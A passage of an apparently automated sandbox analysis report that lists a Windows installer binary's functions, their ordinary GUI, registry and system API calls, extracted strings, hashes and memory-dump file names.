Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalRectSection$ColorEnterFill$ClipExcludeLeaveObjectRestoreSaveStock
String ID:
API String ID: 3001281481-0
Opcode ID: fb274842b96beccf00edb8ade7124585d61aa095127905ea40cd9983a34417fe
Instruction ID: d38e9cc01919466152279994463ad2aa3329fbbc8784a2f9831560b0bea4f07d
Opcode Fuzzy Hash: fb274842b96beccf00edb8ade7124585d61aa095127905ea40cd9983a34417fe
Instruction Fuzzy Hash: BB41EB74A00648EFDB01DFA9C599E9E77F9EB09304F5644A6F908E7352C738AE40DB14

Uniqueness

Uniqueness Score: -1.00%

Function 00433398, Relevance: 9.1, APIs: 6, Instructions: 84COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 004333E6
GetSystemMetrics.USER32 ref: 004333F2
GetDC.USER32(00000000), ref: 0043340E
GetDeviceCaps.GDI32(00000000,0000000E), ref: 00433435
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00433442
ReleaseDC.USER32 ref: 0043347B

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: CapsDeviceMetricsSystem$Release
String ID:
API String ID: 447804332-0
Opcode ID: a8867e4a5af838ebc4450a2cdaea44e7b3695b17798a5065638d72f791061843
Instruction ID: 10a078c6cdb5354d6897092c75105f3ab4e8e976a14d47c5d0000f8528dc16b8
Opcode Fuzzy Hash: a8867e4a5af838ebc4450a2cdaea44e7b3695b17798a5065638d72f791061843
Instruction Fuzzy Hash: F4314370A00205EFEB01DF65C881AAEBBB5FF4D714F10816AF814AB395C6749D41CB69

Uniqueness

Uniqueness Score: -1.00%

Function 004B8EF8, Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 72COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(00000057,00000000,004B8FC3,?,?,?,00000000), ref: 004B8F62
SetLastError.KERNEL32(00000000,00000002,?,?,?,004B9064,?,00000000,004B8FC3,?,?,?,00000000), ref: 004B8FA1

Strings

CURRENT_USER, xrefs: 004B8F36
MACHINE, xrefs: 004B8F45
CLASSES_ROOT, xrefs: 004B8F27
USERS, xrefs: 004B8F54

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast
String ID: CLASSES_ROOT$CURRENT_USER$MACHINE$USERS
API String ID: 1452528299-1580325520
Opcode ID: 7a96acfe65d331c98d45180d0f3d443f2530f5def99249a89223065b1a1ceb58
Instruction ID: 7d268dca93ec31449704e8a19c303644d8c2d2922d5d103a8fa3f98022615f52
Opcode Fuzzy Hash: 7a96acfe65d331c98d45180d0f3d443f2530f5def99249a89223065b1a1ceb58
Instruction Fuzzy Hash: 1A115735214108AFDB00EEA5C991AFA72AEDB48344F61847F790562681DA7D9F01D63D

Uniqueness

Uniqueness Score: -1.00%

Function 004E06F4, Relevance: 9.1, APIs: 6, Instructions: 66COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 004E0710
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,004FCA5D,00000000,004FD344), ref: 004E073F
GetWindowLongW.USER32(?,000000EC), ref: 004E0754
SetWindowLongW.USER32 ref: 004E077A
ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 004E0793
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 004E07B4

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Long$Show
String ID:
API String ID: 3609083571-0
Opcode ID: a0f7aed80030da84f220263879103cfce8548d19df31fb8f64e47b8ff7784545
Instruction ID: 8a5f4901f25ab44273ccf00b5fddc28949ca47e71d1d0f0a71335c51213cfc66
Opcode Fuzzy Hash: a0f7aed80030da84f220263879103cfce8548d19df31fb8f64e47b8ff7784545
Instruction Fuzzy Hash: 68115B76245700DFC711EB69D885F6633E8BB0E311F0902A5FA59DB3E2C279AC44AF05

Uniqueness

Uniqueness Score: -1.00%

Function 00433044, Relevance: 9.1, APIs: 6, Instructions: 56windowCOMMON

Download Yara Rule

APIs

CreateCompatibleDC.GDI32(00000000), ref: 0043305D
SelectObject.GDI32(00000000,00000000), ref: 00433066
GetDIBColorTable.GDI32(00000000,00000000,00000100,?,00000000,00000000,00000000,00000000,?,?,00435C8F,?,?,?,?,004341AB), ref: 0043307A
SelectObject.GDI32(00000000,00000000), ref: 00433086
DeleteDC.GDI32(00000000), ref: 0043308C
CreatePalette.GDI32 ref: 004330D3

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateObjectSelect$ColorCompatibleDeletePaletteTable
String ID:
API String ID: 2515223848-0
Opcode ID: 67d5b31ad8e59d643610846fb53b20dfdd137163830d16b6c4bb75eee91133d8
Instruction ID: 10a01b2ebcba3fabeb6ce51341f1d29352740cce8b21cf4feb015a9e797e61c7
Opcode Fuzzy Hash: 67d5b31ad8e59d643610846fb53b20dfdd137163830d16b6c4bb75eee91133d8
Instruction Fuzzy Hash: 0701846120434062D714A77A9C43B6B72F89FC4719F04982FB588A73D3E67D8D04835A

Uniqueness

Uniqueness Score: -1.00%

Function 00401B0C, Relevance: 9.0, APIs: 7, Instructions: 298sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000,?,00401ADA), ref: 00401BC3
Sleep.KERNEL32(0000000A,00000000,?,00401ADA), ref: 00401BD9
Sleep.KERNEL32(00000000,?,?,?,00401ADA), ref: 00401C07
Sleep.KERNEL32(0000000A,00000000,?,?,?,00401ADA), ref: 00401C1D

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: f2665f47995e0485457f0e2780245f5668f8ebccbaa697cd9a5133d53e961b81
Instruction ID: cbc8dfd461c6340acf1db927b4aa35f28c4891fc497053a84e4b188e38708ede
Opcode Fuzzy Hash: f2665f47995e0485457f0e2780245f5668f8ebccbaa697cd9a5133d53e961b81
Instruction Fuzzy Hash: 9FC146726002508BD725CF29DC8475ABBE0EB95320F18C27FE849AB3F5C778A855DB94

Uniqueness

Uniqueness Score: -1.00%

Function 00442CA4, Relevance: 9.0, APIs: 6, Instructions: 46COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00442CB0
GetTextMetricsW.GDI32(?,?,00000000,00442D1A,?,00000000), ref: 00442CCE
SelectObject.GDI32(?,00000000), ref: 00442CE3
GetTextMetricsW.GDI32(?,?,?,00000000,?,?,00000000,00442D1A,?,00000000), ref: 00442CF2
SelectObject.GDI32(?,00000000), ref: 00442CFC
ReleaseDC.USER32 ref: 00442D14

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: MetricsObjectSelectText$Release
String ID:
API String ID: 833910088-0
Opcode ID: 7f87a21389f62ce39c7bf41f826f1dcedc2af86a124b712b142eea22f75adcfe
Instruction ID: ae0a2ff06e7428296a63baba77d0671b5a5cfc29f0e662262cfcf32d2c6841bd
Opcode Fuzzy Hash: 7f87a21389f62ce39c7bf41f826f1dcedc2af86a124b712b142eea22f75adcfe
Instruction Fuzzy Hash: 1401E575A04248BFDB41EBE9CC51E9EB7FCEB0C704F510566F504E3292D6789D008B28

Uniqueness

Uniqueness Score: -1.00%

Function 0043272C, Relevance: 9.0, APIs: 6, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 0043170C: CreateBrushIndirect.GDI32(?), ref: 004317B7

UnrealizeObject.GDI32(00000000), ref: 00432738
SelectObject.GDI32(00000000,00000000), ref: 0043274A
SetBkColor.GDI32(00000000,00000000), ref: 0043276D
SetBkMode.GDI32(00000000,00000002), ref: 00432778
SetBkColor.GDI32(00000000,00000000), ref: 00432793
SetBkMode.GDI32(00000000,00000001), ref: 0043279E

Part of subcall function 004306C0: GetSysColor.USER32(00432508), ref: 004306CA

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
String ID:
API String ID: 3527656728-0
Opcode ID: 03dfce32e7b03e070807b2da7cbc7753c3f69c98b2c12908884259f7362c2824
Instruction ID: d924aaae57d6af534c2e3b3453abf267d643b0867a8777519658f73120764626
Opcode Fuzzy Hash: 03dfce32e7b03e070807b2da7cbc7753c3f69c98b2c12908884259f7362c2824
Instruction Fuzzy Hash: 19F06FB5600140ABDF00FFAAD9C7D077BA86F48309B085496B904DF1ABC669DC104B39

Uniqueness

Uniqueness Score: -1.00%

Function 004B2358, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 245windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 004B23D5
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 004B23FC
SetForegroundWindow.USER32(?,00000000,004B26E9,?,00000000,004B2727), ref: 004B240D
DefWindowProcW.USER32(00000000,?,?,?,00000000,004B26E9,?,00000000,004B2727), ref: 004B26D4

Strings

Cannot evaluate variable because [Code] isn't running yet, xrefs: 004B2550

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: MessagePostWindow$ForegroundProc
String ID: Cannot evaluate variable because [Code] isn't running yet
API String ID: 602442252-3182603685
Opcode ID: 168983e6f1515977dca93afec3407ab7f5d997d3ded40747e75dde1823573508
Instruction ID: c0b2866982009758f5139b0b17c60d61db4cc145b66916fa1f5170bb4655b13e
Opcode Fuzzy Hash: 168983e6f1515977dca93afec3407ab7f5d997d3ded40747e75dde1823573508
Instruction Fuzzy Hash: 4891B534604208AFEB15DF68D991F9ABBF5FB49700F1184A6F90497791CB78AD40DF28

Uniqueness

Uniqueness Score: -1.00%

Function 004B01B4, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 149registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0047FD20: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,004803F6,?,00000000,?,00480396,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,004803F6), ref: 0047FD3C

RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,004B035A,?,00000000,004B039A), ref: 004B029D

Strings

PendingFileRenameOperations, xrefs: 004B0230
SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 004B0214
PendingFileRenameOperations2, xrefs: 004B0266
WININIT.INI, xrefs: 004B02CC

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseOpen
String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager$WININIT.INI
API String ID: 47109696-2199428270
Opcode ID: a07e97462c87c0599c02b994cd056322859f47570c9701a3e5cf07762ec408e1
Instruction ID: 8b2bf2004dcf31f50ce58d6375065bc2385e602e1d6443e39772af2abe95cc81
Opcode Fuzzy Hash: a07e97462c87c0599c02b994cd056322859f47570c9701a3e5cf07762ec408e1
Instruction Fuzzy Hash: 33518630A042089FDB14DFA5D855ADFB7F8EB45304F5080BBE945E7391DB78AE05CA28

Uniqueness

Uniqueness Score: -1.00%

Function 00458E44, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 113COMMON

Download Yara Rule

APIs

GetCursorPos.USER32(0050B10C), ref: 00458E65
GetCursor.USER32(0050B10C), ref: 00458E81

Part of subcall function 00458034: SetCapture.USER32(00000000,Function_000581D8,00000000,?,00458E95,0050B10C), ref: 00458043

GetDesktopWindow.USER32 ref: 00458F73

Strings

(GE, xrefs: 00458EA2
X~E, xrefs: 00458F8C

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Cursor$CaptureDesktopWindow
String ID: (GE$X~E
API String ID: 669539147-428204910
Opcode ID: 50a98c42ccfaf7ce6c9f9f2f6211b075bf0ad58f6d5024f54c47543e506a07f1
Instruction ID: a2272b759aad7807cea790850517ee59c322f9e46e9b8c95fbcb818153eaeef1
Opcode Fuzzy Hash: 50a98c42ccfaf7ce6c9f9f2f6211b075bf0ad58f6d5024f54c47543e506a07f1
Instruction Fuzzy Hash: 8241B0716142008FD304DF29E8A86197BE2FB9D311F19C66EE8499B362CF74D849DF89

Uniqueness

Uniqueness Score: -1.00%

Function 004FDAD4, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 102COMMON

Download Yara Rule

APIs

Part of subcall function 0047BF28: SetWindowTextW.USER32(?,00000000), ref: 0047BF58

ShowWindow.USER32(?,00000005,00000000,004FDD8E,?,?,00000000,?), ref: 004FDB1A

Part of subcall function 0047F740: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0047F753

Part of subcall function 0040DD04: SetCurrentDirectoryW.KERNEL32(00000000,?,004FDB42,00000000,004FDD55,?,?,00000005,00000000,004FDD8E,?,?,00000000,?), ref: 0040DD0F

Part of subcall function 0047F29C: GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,0047F333,?,?,?,00000001,?,004B0D32,00000000,004B0D9F), ref: 0047F2D1

Strings

Uninstall, xrefs: 004FDB00
IMsg, xrefs: 004FDBEE
.msg, xrefs: 004FDB80
.dat, xrefs: 004FDB61

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: DirectoryWindow$CurrentFileModuleNameShowSystemText
String ID: .dat$.msg$IMsg$Uninstall
API String ID: 3312786188-1660910688
Opcode ID: 3464bb1b5a40a5836e3aea9abb12710a14251260c2e8292266821b53fe59e360
Instruction ID: 16bd99ad4d4e2e742343a168082ca7933a37df857d856ee64ba0d307e459f67d
Opcode Fuzzy Hash: 3464bb1b5a40a5836e3aea9abb12710a14251260c2e8292266821b53fe59e360
Instruction Fuzzy Hash: 6F416234A002089FC700EF65CD529AF7BF6FB4A704F50856AFA00A7362DB39AD05DB95

Uniqueness

Uniqueness Score: -1.00%

Function 00452BD4, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00000000,00000000,000000FF,00000030), ref: 00452C55
SetMenuItemInfoW.USER32 ref: 00452CAD
DrawMenuBar.USER32(00000000,00000000,00000000,000000FF,00000030,00000000,00452CCD,?,?,?,004533E5,00453418,?,004523ED), ref: 00452CBA

Strings

P, xrefs: 00452C0A
,, xrefs: 00452C2E

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$InfoItem$Draw
String ID: ,$P
API String ID: 3227129158-1419105988
Opcode ID: 3fa19f8121811a9806d3dd80a45565aa98cbb13ca63ba6c3ad358118ffbea68b
Instruction ID: 0be6e2b87da41e439f41ba10be101996003373bbd41e1ea7d0ab9d8ac663d510
Opcode Fuzzy Hash: 3fa19f8121811a9806d3dd80a45565aa98cbb13ca63ba6c3ad358118ffbea68b
Instruction Fuzzy Hash: FD210330A002089FDB12DF68DD80B9E77B8EB06315F504167F800E7383D7B88848CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004526E0, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

GetKeyboardLayoutNameW.USER32(00000000), ref: 0045270A

Part of subcall function 0042E85C: RegCloseKey.ADVAPI32(10AC0000,0042E6D8,00000001,0042E7DA,?,?,0043740E,00000008,00000060,00000048,00000000,004374AE), ref: 0042E870

Part of subcall function 0042E8C0: RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,?,?,00000000,0042EA71), ref: 0042E939

Part of subcall function 00413C38: SetErrorMode.KERNEL32(00008000,?), ref: 00413C42
Part of subcall function 00413C38: LoadLibraryW.KERNEL32(00000000,00000000,00413C8C,?,00000000,00413CAA,?,00008000,?), ref: 00413C71

Part of subcall function 00409620: GetProcAddress.KERNEL32(?,?), ref: 00409644

FreeLibrary.KERNEL32(?,004527D9,?,00000000,00452819), ref: 004527CC

Strings

\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\, xrefs: 0045274F
KbdLayerDescriptor, xrefs: 00452796
Layout File, xrefs: 0045276B

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Library$AddressCloseErrorFreeKeyboardLayoutLoadModeNameOpenProc
String ID: KbdLayerDescriptor$Layout File$\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\
API String ID: 3365787578-2194312379
Opcode ID: 51d1f40225e589cc519ce694e0a1640329a427b49fbed659ecfde024e008121f
Instruction ID: 6a67a1bf7eaac59bab48e2940c1a7806e22ced5ed4176676752f73896576dce2
Opcode Fuzzy Hash: 51d1f40225e589cc519ce694e0a1640329a427b49fbed659ecfde024e008121f
Instruction Fuzzy Hash: C031BF35A00208AFCB01EFA2D9519DDB7F5FB89704B61847BE800B7692D77D9D49CB28

Uniqueness

Uniqueness Score: -1.00%

Function 004B1EA0, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000B06,00000000,00000000), ref: 004B1EBA
